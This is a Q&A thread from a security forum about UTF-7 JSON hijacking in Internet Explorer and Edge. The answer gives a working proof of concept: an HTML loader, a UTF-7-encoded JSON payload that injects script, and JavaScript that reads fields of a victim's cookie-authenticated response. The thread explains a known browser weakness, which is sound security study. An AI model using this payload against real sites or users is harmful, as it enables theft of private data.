0

After some research, I saw an answer on StackOverflow saying that it's still possible to perform a UTF-7 JSON hijack using Microsoft IE and Edge browsers. If yes how can it be done? I really need an explanation about this or a working proof of concept.

schroeder
  • 123,438
  • 55
  • 284
  • 319
Test
  • 55
  • 8
  • 1
    It would help if you referenced the actual question you are talking about. If you mean this question: http://stackoverflow.com/questions/16289894/is-json-hijacking-still-an-issue-in-modern-browsers then the accepted answer has a PoC. – schroeder Apr 21 '16 at 04:11
  • @schroeder I think the OP is talking about UTF-7 XSS: http://security.stackexchange.com/questions/47489/utf-7-xss-attacks-in-modern-browsers, since he mentioned UTF-7. The link you found is about JSON hijacking by modifying prototypes. – Franklin Yu Oct 01 '16 at 03:41
  • @FranklinYu but that question is not on StackOverflow ... – schroeder Oct 01 '16 at 06:31
  • @schroeder Yes, I didn't mean that the question I linked was the one OP encountered. I meant he might be searching for such a topic. I can't find anything about the topic on StackOverflow, and I think OP might benefit reading the Q&A. Anyway, who knows, OP hasn't shown up since August. – Franklin Yu Oct 01 '16 at 17:35

1 Answers1

3

I assume you're referring to this comment, "Microsofts IE and Edge are still vulnerable to the UTF-7 JSON Hijacking though."

Following the instructions from this 2011 blog post on JSON Hijacking, I reproduced the problem with Microsoft Edge 20 and IE11.

Create an HTML file like this:

<html>
<body>
<script src="x.json" charset="UTF-7"></script>

And an x.json file like this:

[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]

In the UTF-7 encoding, that apparently decodes to:

[{'friend':'luke','email':''}];alert(‘May the force be with you’);[{'job':'done'}]

And then, given the power to execute JavaScript in the context of the response, you can write more/other evil code, e.g. code to read the rest of the response. For example:

[{'friend':'luke','email':''}, 1].sort(function(x,y) {
for (var o in x) {
alert(o + “:” + x[o]);
}
});
setTimeout(function() {
var x = data[0];
for (var o in x) {
alert(o + “:” + x[o]);
}
}, 100);var data=[{'job':'done'}];

Read the blog post for more details about the implications of this, but the idea is that you'd get a user to open a page on your site, make this script request (which would use the victim's cookie credentials), and then JSON hijack it to read a partial list of the user's friends.

Community
  • 1
Dan Fabulich
  • 131
  • 2
  • I think a key point here is that you need to be able to set some of the data you're getting. If you are one of the victims friends, for instance... – DylanYoung Nov 23 '17 at 16:22
  • I did this in 2010 at https://www.reddit.com/r/programming/comments/b7ebd/json_sniffing_with_utf7_injections_will_only_work/ and https://web.archive.org/web/20100304213300/http://code.eligrey.com/poc/json-hijacking/ – Eli Grey Mar 10 '19 at 21:58